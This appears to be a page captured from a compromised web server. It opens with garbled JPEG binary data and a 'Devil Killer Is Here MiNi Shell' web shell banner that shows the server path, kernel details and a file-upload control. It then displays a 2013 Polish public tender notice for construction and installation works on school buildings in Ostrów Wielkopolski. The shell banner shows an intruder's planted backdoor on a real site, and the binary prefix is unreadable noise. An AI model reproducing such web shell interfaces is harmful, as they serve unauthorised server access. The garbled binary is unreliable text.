JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131204/261727-N-2013.html

<p class="kh_header"><b>Ostrów Wielkopolski: Termomodernizacja i przebudowa budynków przy ul. Wolności 10 i 12 w Ostrowie Wielkopolskim - ETAP V</b><br>
<b>Numer ogłoszenia: 261727 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Usługowych , ul. Wolności 12, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 0 62 736 51 82, faks 0 62 736 51 82.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zsu.osw.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja i przebudowa budynków przy ul. Wolności 10 i 12 w Ostrowie Wielkopolskim - ETAP V.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> BUDYNEK UL. WOLNOŚCI 10:
1. 	ROBOTY BUDOWLANE:
1.1 	ROBOTY DEMONTAŻOWO - ROZBIÓRKOWE:
1.1.1 	Demontaż instalacji elektrycznych - 1 [kpl.],
1.1.2 	Demontaż instalacji sanitarnych - 1 [kpl.],
1.1.3 	Rozebranie ścianek z cegieł gr. 12 [cm] - 58.046 [m2],
1.1.4 	Wykucie otworów w ścianach o gł. 1c - 9,617 [m3],
1.1.5 	Wykucie bruzd pionowych w ścianach z cegieł - 103,93 [m],
1.1.6 	Mechaniczne przebijanie otworów w stropach kondygnacji z cegły o długości przebicia do 1 1)2 ceg. - śr.rury 150 mm - 118 [otw.],
1.1.7 	Wykucie wnęk w ścianach z cegły na zaprawie cementowej - 10,731 [m3],
1.2. 	ROBOTY MUROWE, KOMINY WENTYLACYJNE: 
1.2.1 	Spalinowe i dymowe kanały z pustaków ceramicznych 19 x19 [cm] dn15 cm - 782,35 [m],
1.2.2 	Obmurówka kominów cegłą klinkierową - 219,64 [m2],
1.2.3 	Instalacja odgromowa dn. 8 [mm] - 76,5 [m],
1.2.4 	Uzupełnienia ścian cegłą ceramiczna pełną - 22,856 [m3],
1.2.5 	Ścianki działowe z cegły ceramicznej pełnej 15 [MPa] o gr. 1)2c - 23,613 [m2],
1.2.6 	Ściany z cegły ceramicznej pełnej 15 [MPa] o gr. 1c - 24,025 [m2],
1.3. 	ROBOTY KONSTRUKCYJNE:
1.3.1 	Nadproża stalowe z dwuteownika 140 - 67,10 [m],
1.3.2 	Strop TERIVA II - 62,781 [m2],
1.3.3 	Wieńce żelbetowe C25)30 - 5,518 [m3],
1.3.4 	Dostawa, montaż konstrukcji w salach zajęć tanecznych - 4,193 [t].
1.4. 	ROBOTY WYKOŃCZENIOWE NA GOTOWO ZESPOŁÓW SANITARNYCH ORAZ I I II PIĘTRA:
1.4.1 	POSADZKI:
1.4.1.1 	Mechaniczne szlifowanie starych posadzek z deszczułek - 572,0 [m2],
1.4.1.2 	Trzykrotne lakierowanie parkietu dębowego lakierem nie przyciemniającym - 572,0 [m2]
1.4.1.3 	Wymiana cokołów 2x10 cm z drewna liściastego (zlicowane powierzchnią zewnętrzną z licem tynku na ścianie - jedna płaszczyzna) - 453,8 [m],
1.4.1.4 	Posadzki z paneli podłogowych AC5 - 35,020 [m2],
1.4.2 	POSADZKI ZESPOŁÓW SANITARNYCH:
1.4.2.1 	Izolacja przeciwwilgociowa z papy termozgrzewalnej podkładowej gr. 5,4 [mm] zbrojonej - 77,607 [m2],
1.4.2.2 	Izolacja cieplna ECOTHERM gr. 15 [cm] - 42,78 [m],
1.4.2.3 	Okładziny podłogowe z płytek gressowych 60 x 60 [cm] - 62,550 [m2],
1.4.3 	ŚCIANY:
1.4.3.1 	Obsadzenie prefabrykowanych podokienników długości ponad 1 m (z konglomeratu gr. min. 3,0 [cm], krawędzie zfazowane) - 33 [szt.],
1.4.3.2 	(z.X) Gładzie gipsowe gr. 3 mm jednowarstwowe na ścianach na podłożu z tynku w pomieszczeniach o pow. podłogi ponad 5 m2 (wraz z wyprowadzeniem narożników ścian) - 1509,593 [m2],
1.4.3.3 	Dwukrotne malowanie farbami lateksowymi starych tynków wewnętrznych sufitów - 743,36 [m2],
1.4.3.4 	Dwukrotne malowanie farbami lateksowymi starych tynków wewnętrznych ścian - 1509,36 [m2],
1.4.3.5 	Dostawa i montaż kratek wentylacyjnych 14 x 14 [cm] ze stali nierdzewnej satynowanej z żaluzją - 35 [szt.],
1.4.3.6 	Okładziny ścienne - płytki okładzinowe ścienne 30x60 cm - 173,712 [m2],
1.4.3.7 	Okładziny z płyt gipsowo-kartonowych (suche tynki gipsowe) pojedyncze gr. 12,5 [mm] na ścianach na zaprawie bez pasków - 375,205 [m2].

1.4.4 	WYPOSAŻENIE WC

1.4.4.1 	Dostawa i montaż ścianek i drzwi sanitarnych w systemie SANIPOL HPL-PR - 36,366 [m2],
1.4.4.2 	Dostawa i montaż lustra nad umywalkami (szlif krawędziowy 2,0 [cm]) - 27,8 [m2].
1.4.5 	STOLARKA DRZWIOWA:
1.4.5.1 	Skrzydła drzwiowe płytowe wewnętrzne pełne jednoskrzydłowe fabrycznie wykończone - 37,149 [m2],
1.4.5.2 	Ościeżnice drewniane regulowane, fabrycznie wykończone na pełną gr. muru 50 [cm] - 38,691 [m2],
1.4.5.3 	Drzwi szklane jednoskrzydłowe + witryna (ze szkła bezpiecznego - 18,744 [m2]
1.4.6 	WIRTYNY P.POŻ.:
1.4.6.1 	Drzwi aluminiowe dwuskrzydłowe + witryna (p-.poż. EI30, EI60) - 30,133 [m2],
2. 	INSTALACJE SANITARNE:
2.1 	PIONY SANITARNE, WODOCIĄGOWE, PODEJŚCIA:
2.1.1 	Demontaż rurociągu żeliwnego kanalizacyjnego o śr. 150 mm - na ścianach budynku - 59,2 [m],
2.1.2 	Rurociągi z PVC kanalizacyjne o śr. 160 mm w gotowych wykopach - 25,0 [m],
2.1.3 	Rurociągi z PVC kanalizacyjne o śr. 160 mm na ścianach - 29,60 [m],
2.1.4 	Rurociągi z PVC o śr. zewnętrznej 32 mm łączone metodą klejenia, w wykopie - 85,44 [m],
2.1.5 	Rurociągi z PVC o śr. zewnętrznej 32 mm łączone metodą klejenia, na ścianach w budynkach niemieszkalnych - 84,0 [m],
2.1.6 	Rurociągi z PVC o śr. zewnętrznej 20 mm łączone metodą klejenia, na ścianach - 616,5 [m],
2.2 	ROBOTY SANITARNE:
2.2.1 	Demontaż białego osprzętu sanitarnego - 1 [kpl.],
2.2.2 	Dostawa i montaż oczek ustępowych w systemie np. GEBERIT - 18 [kpl.],
2.2.3 	Dostawa i montaż umywalek porcelanowych 60 x 45 [cm] z półnogą - 11 [kpl],
2.2.4 	Dostawa i montaż pisuarów porcelanowych w systemie GEBERIT - 1 [kpl.],
2.2.5 	Baterie umywalkowe, jednouchwytowe - 11 [kpl.].
2.3 	INSTALACJA HYDRANTOWA:
2.3.1 	Rurociągi stalowe ocynkowane o śr. nominalnej 32 mm o połączeniach gwintowanych, na ścianach - 42,5 [m],
2.3.2 	Rurociągi stalowe ocynkowane o śr. nominalnej 50 mm o połączeniach gwintowanych, na ścianach - 28,5 [m[,
2.3.3 	Zawór hydrantowy o śr. nominalnej 25 mm montowany we wnęce - 7 [kpl.]
2.4 	INSTALACJA C.O.:
2.4.1 	Demontaż grzejnika żeliwnego członowego - 78 [kpl.],
2.4.2 	Demontaż grzejnika stalowego płytowego - 3 [kpl.],
2.4.3 	Demontaż Fafiera - 8 [kpl.],
2.4.4 	Demontaż rurociągu stalowego o połączeniach spawanych - 655,92 [m],
2.4.5 	Wykucie wnęk pod grzejniki - 91,119 [m2],
2.4.5 	Wykucie bruzd poziomych - 1040,535 [m],
2.4.6 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 50 mm o połączeniach zgrzewanych na ścianach w budynkach - 59,033 [m],
2.4.7 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 40 mm o połączeniach zgrzewanych na ścianach w budynkach - 59,033 [m],
2.4.8 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 32 mm o połączeniach zgrzewanych na ścianach w budynkach - 398,40 [m],
2.4.9 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 25 mm o połączeniach zgrzewanych na ścianach w budynkach - 118,065 [m],
2.4.10 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 20 mm o połączeniach zgrzewanych na ścianach w budynkach - 177,098 [m],
2.4.11 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 20 mm o połączeniach zgrzewanych na ścianach w budynkach - 288,0 [m],
2.4.12 	Grzejniki stalowe jednopłytowe - 14 [szt.],
2.4.13 	Grzejniki stalowe dwupłytowe - 21 [szt.],
2.4.14 	Grzejniki stalowe trzypłytowe - 50 [szt.],
2.4.15 	Różnicowe regulatory ciśnienia; śr. nom. 32 mm (zawory podpionowe) - 26 [szt.],
2.4.16 	Głowice termostatyczne - 85 [kpl.],
3. 	ROBOTY ELEKTRYCZNE:
3.1 	INSTALACJE ELEKTRYCZNE (SYSTEM ODDYMIANIA):
3.1.1	przewody kabelkowe YnTKSY 4x2x0.8 - 275,5 [m],
3.1.2 	przewody kabelkowe YDYp 3x,1,5 - 48 [m],
3.1.3 	przewody kabelkowe HDGS 3x1.5 mm2 PH90 - 67,0 [m].
3.2 	INSTALACJE ELEKTRYCZNE SILNOPRĄDOWE:
3.2.1 	INSTALACJA ELEKTRYCZNA OŚWIETLENIOWA:
3.2.1.1.	Przewód kabelkowy płaski - łączny przekrój żył do 7.5 mm2 (podłoże inne niż beton) układany w tynku YDYp 3 x 2,5 [mm2] 750 [V] - 520,02 [m],
3.2.1.2	Przewód kabelkowy płaski - łączny przekrój żył do 7.5 mm2 (podłoże inne niż beton) układany w tynku YDYp 3 x 1,5 [mm2] 750 [V] - 2525,1 [m],
3.2.2 	INSTALACJA ELEKTRYCZNA GNIAZD WTYKOWYCH:
3.2.2.1 	Przewód kabelkowy płaski - łączny przekrój żył do 7.5 mm2 (podłoże inne niż beton) układany w tynku YDYp 3 x 1,5 [mm2] 750 [V] - 456,0 [m],
3.2.2.2 	Przewód kabelkowy płaski - łączny przekrój żył do 7.5 mm2 (podłoże inne niż beton) układany w tynku YDYp 3 x 2,5 [mm2] 750 [V] - 2241,0 [m].
3.2.3 	INSTALACJA ELEKTRYCZNA WYPUSTÓW KABLOWYCH:
3.2.3.1 	Przewód kabelkowy płaski - łączny przekrój żył do 7.5 mm2 (podłoże inne niż beton) układany w tynku YDYp 3 x 2,5 [mm2] 750 [V] - 847,6 [m],
3.2.3.2 	Przewód kabelkowy płaski - łączny przekrój żył do 7.5 mm2 (podłoże inne niż beton) układany w tynku YDYp 5 x 6 [mm2] 750 [V] - 42,0 [m].
3.2.4 	INSTALACJA ELEKTRYCZNA DEDYKOWANA:
3.2.4.1 	Przewód kabelkowy płaski - łączny przekrój żył do 7.5 mm2 (podłoże inne niż beton) układany w tynku YDYp 3 x 2,5 [mm2] 750 [V] - 322,0 [m].

BUDYNEK UL. WOLNOŚCI 12:
1. 	ROBOTY PRZYGOTOWAWCZE:
1.1 	Demontaż instalacji sanitarnych - 1 [kpl.],
1.2 	Demontaż instalacji elektrycznych - 1 [kpl.],
1.3 	Rozbiórka ścianek działowych - 21,18 [m2],
1.4 	Wykucie wnęk o głębokości 0,32 [cm] - 21,07 [m2],
1.5 	Wykucie bruzd pionowych - 62,7 [m],
1.6 	Wykucie bruzd poziomych - 180,0 [m],
1.7 	Mechaniczne przebijanie otworów w stropach kondygnacji z cegły o długości przebicia do 1 1)2 ceg - 41 [otw.],
1.8 	Wykucie wnęk w ścianach z cegły pod pustaki wentylacyjne 19 x 19 [cm] - 4,44 [m3],
1.9 	Skucie nierówności betonu podłoża pod posadzkę - 269,179 [m2],
1.10 	Mechaniczne przebijanie otworów w stropach kondygnacji z cegły o długości przebicia do 1 1)2 ceg. - 41 [otw.].
2. 	ROBOTY MUROWE:
2.1 	Ścianki działowe z cegły pełnej gr. 12 [cm] - 11,36 [m2],
2.2 	Zamurowanie bruzd poziomych - 180 [m],
2.3 	Zamurowywanie bruzd pionowych - 39 [m],
2.4 	Uzupełnienie ścian cegłą ceramiczną pełną 15 [MPa] - 4,214 [m3],
2.5 	Kominy z pustaków ceramicznych 19 x 19 [cm] - 107,2 [m],
3. 	ŚCIANY:
3.1 	Okładziny ścienne z płytek z kamieni sztucznych o regularnych kształtach na zaprawie klejowej cienkowarstwowej; płytki o wymiarach 30x60 cm - 275,822 [m2],
3.2 	Wykonanie narożników z wklęsłych i wypukłych kształtek ceramicznych o szerokości w rozwinięciu do 70 mm na zaprawie cienkowarstwowej - 229,23 [m],
3.3 	Okładziny ścienne z płytek z kamieni sztucznych o regularnych kształtach na zaprawie klejowej cienkowarstwowej; płytki o wymiarach 30x60 cm - 275,822 [m2],
3.3 	Okładziny z płyt gipsowo-kartonowych (suche tynki gipsowe) pojedyncze na ścianach na zaprawie bez pasków - 286,198 [m2],
3.4 	Roboty malarskie - 555,377 [m2].
4. 	POSADZKI:
4.1 	Warstwa wyrównawcza z zaprawy cementowej gr. 2,0 [cm] - 269,179 [m2],
4.2 	Izolacja przeciwwilgociowa z papy termozgrzewalnej gr. 5,4 [mm], zbrojonej - 321,896 [m2],
4.3 	Beton spadkowy gr. średniej 7,0 [cm] C25)30 - 16,151 [m3],
4.4 	Dostawa i montaż profilu dylatacyjnego - 83,153 [m],
4.5 	Okładzina podłogowa z płytek gressowych nieścieralnych, antypoślizgowych w jasnym pastelowym kolorze - 269,179 [m2],
5. 	STOLARKA DRZWIOWA:
5.1 	Ościeżnice regulowane z drewna klejonego sosnowego - 27,649 [m2],
5.2 	Skrzydła drzwiowe wewnętrzne z drewna klejonego dębowego - 15,631 [m2],
5.3 	Drzwi kompletne szklane jednoskrzydłowe wykonane ze szkła bezpiecznego - 4,40 [m2],
5.4 	Witryny szklane kompletne ze szkła bezpiecznego - 8,454 [m2],
5.5 	Drzwi kompletne szklane dwuskrzydłowe ze szkła bezpiecznego - 10,409 [m2],
5.6 	Drzwi aluminiowe kompletne, przeszklone - 4,2 [m2].
6. 	ROBOTY WYKOŃCZENIOWE:
6.1 	Dostawa i montaż ścianek działowych sanitarnych - 13,581 [m2],
6.2 	Systemowe listwy odbojowe z PCV i aluminium - 61,54 [m2],
6.3 	Dostawa i osadzenie prefabrykowanych podokienników z konglomeratu o gr. 3,0 [cm] - 15 [szt.],
6.4 	Dostawa i osadzenie prefabrykowanych blatów z konglomeratu o gr. 3,0 [cm] - 2 [szt.],
6.5 	Sufit podwieszony z płyt systemowych 120 x 60 [cm] - 64,7 [m2],
7. 	INSTALACJA C.O.:
7.1 	Demontaż istniejących natynkowych rurociągów c.o. - 123,785 [m],
7.2 	Wykucie bruzd poziomych - 243,216 [m],
7.3 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 50 mm o połączeniach zgrzewanych na ścianach w budynkach - 59,018 [m],
7.4 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 40 mm o połączeniach zgrzewanych na ścianach w budynkach - 59,018 [m],
7.5 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 32 mm o połączeniach zgrzewanych na ścianach w budynkach - 65,16 [m],
7.6 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 25 mm o połączeniach zgrzewanych na ścianach w budynkach - 59,018 [m],
7.7 	Rurociągi w instalacjach c.o. z tworzyw sztucznych o śr. zewnętrznej 20 mm o połączeniach zgrzewanych na ścianach w budynkach - 148,527 [m],
7.8 	Grzejniki stalowe trzypłytowe np. PRC33-900-1000-2144 - 2 [szt.],
7.9 	Grzejniki stalowe trzypłytowe (higieniczne do pomieszczeń pracowni technologii żywienia) np. PH30-900-1200 - 12 [szt.]
7.10 	Izolacja rurociągów c.o. - 391,227 [m].
8. 	INSTALACJA SANITARNA:
8.1 	Rurociągi z PVC kanalizacyjne o śr. 160 mm - 90,75 [m],
8.2 	Rurociągi z PVC kanalizacyjne o śr. 110 mm - 8 [m],
8.3 	Rurociągi z PVC kanalizacyjne o śr. 75 mm - 98,5 [m],
8.5 	Rurociągi z PVC kanalizacyjne o śr. 160 mm - 124,1 [m],
8.6 	Rurociągi z PVC o śr. zewnętrznej 32 mm łączone metodą klejenia - 177 [m],
8.7 	Rurociągi z rur warstwowych Geberit Mepla Therm o śr. zewn. 20 mm (woda ciepła) - 168,5 [m],
8.8 	Rurociągi z rur warstwowych Geberit Mepla Flex o śr. zewn. 20 mm (woda zimna) - 168,5 [m],
8.9 	Rurociągi z rur warstwowych Geberit Mepla Therm o śr. zewn. 20 mm (woda recyrkulacyjna) - 168,5 [m],
8.10 	Dostawa i montaż oczek ustępowych - 3 [kpl.],
8.11 	Dostawa i montaż pisuaru - 1 [kpl.],
8.12 	Dostawa i montaż umywalek - 7 [kpl.],
9. 	INSTALACJA ELEKTRYCZNA:
9.1 	Przewód miedziany 3 x 1,5 [mm2] - 2520 [m],
9.2 	Przewód miedziany wtynkowy 3 x 2,5 [mm2] - 396,0 [m],
9.3 	Przewód miedziany 3 x 2,5 [mm2] - 304,5 [m],
9.4 	Przewód miedziany 3 x 2,5 [mm2] - 258,0 [m],
9.5 	Przewód miedziany 4 x 6,0 [mm2] - 277,0 [m],
9.6 	Oprawy oświetleniowe świetlówkowe IP44 - 37 [kpl.],
9.7 	Oprawy oświetleniowe ledowe 120 x 20 [cm] - 9 [kpl.],
9.8 	Moduł oświetlenia awaryjnego - 9 [kpl.]..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, na zasadzie art. 67 ust. pkt 6 ustawy Pzp, w przypadku posiadania przez Zamawiającego środków na ich realizację. Zamówienie uzupełniające musi być wykonane przy jednoczesnym zachowaniu tych samych norm, standardów i parametrów zgodnych z SIWZ zamówienia podstawowego, oraz nośnikami cenotwórczymi ujętymi w ofercie Wykonawcy.

Zakres zamówień uzupełniających:
1. ROBOTY WYKOŃCZENIOWE PIĘTRA:
1.1 POSADZKI:
1.1.1 Mechaniczne szlifowanie starych posadzek z deszczułek - 223,65 [m2],
1.1.2 Trzykrotne lakierowanie parkietu dębowego lakierem nie przyciemniającym - 23,65 [m2]
1.1.3 Wymiana cokołów 2x10 cm z drewna liściastego (zlicowane powierzchnią zewnętrzną z licem tynku na ścianie - jedna płaszczyzna) - 197,34 [m],
1.2 SUFITY PODWIESZONE:
1.2.1 Sufity akustyczne z płyt ECOPHON - 257,59 [m2],
1.2.2 Okładziny stropów płytami p.poż. FARMACEL 2 x 15 [mm] - 1114,53 [m2].
1.3 ŚCIANY:
1.3.1 Obsadzenie prefabrykowanych podokienników długości ponad 1 m (z konglomeratu gr. min. 3,0 [cm], krawędzie zfazowane) - 17 [szt.],
1.3.2 (z.X) Gładzie gipsowe gr. 3 mm jednowarstwowe na ścianach na podłożu z tynku w pomieszczeniach o pow. podłogi ponad 5 m2 (wraz z wyprowadzeniem narożników ścian) - 899,721 [m2],
1.3.3 Dwukrotne malowanie farbami latexowymi starych tynków wewnętrznych sufitów - 371,26 [m2],
1.3.4 Dwukrotne malowanie farbami latexowymi starych tynków wewnętrznych ścian - 859,721 [m2],
1.3.5 Dostawa i montaż kratek wentylacyjnych 14 x 14 [cm] ze stali nierdzewnej satynowanej z żaluzją - 20 [szt.],
1.3.6 Okładziny z płyt gipsowo-kartonowych (suche tynki gipsowe) pojedyncze gr. 12,5 [mm] na ścianach na zaprawie bez pasków - 205,282 [m2].
1.4 KLATKA SCHODOWA:
1.4.1 Okładziny schodów konglomeratem - 160,999 [m2],
1.4.2 Balustrady schodowe ze stali nierdzewnej, wypełnione szkłem bezoiecznym - 29,05 [m],
1.4.3 Poczwyt schodowy ze stali nierdzewnej - 25,9 [m].
1.5 STOLARKA DRZWIOWA:
1.4.5.1 Skrzydła drzwiowe płytowe wewnętrzne pełne jednoskrzydłowe fabrycznie wykończone - 37,149 [m2] ,
1.4.5.2 Ościeżnice drewniane regulowane, fabrycznie wykończone na pełną gr. muru 50 [cm] - 37,147
[m2],
1.4.5.3 Drzwi szklane jednoskrzydłowe + witryna (ze szkła bezpiecznego - 15,226 [m2]
1.6 WIRTYNY P.POŻ.:
1.4.6.1 Drzwi aluminiowe dwuskrzydłowe + witryna (p-.poż. EI30, EI60) - 15,226 [m2]</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert wykonawca wnosi wadium w wysokości: 20.000,00 zł (słownie: dwadzieścia tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia-nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa w pkt 8.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia-nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa w pkt 8.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia-nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa w pkt 8.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
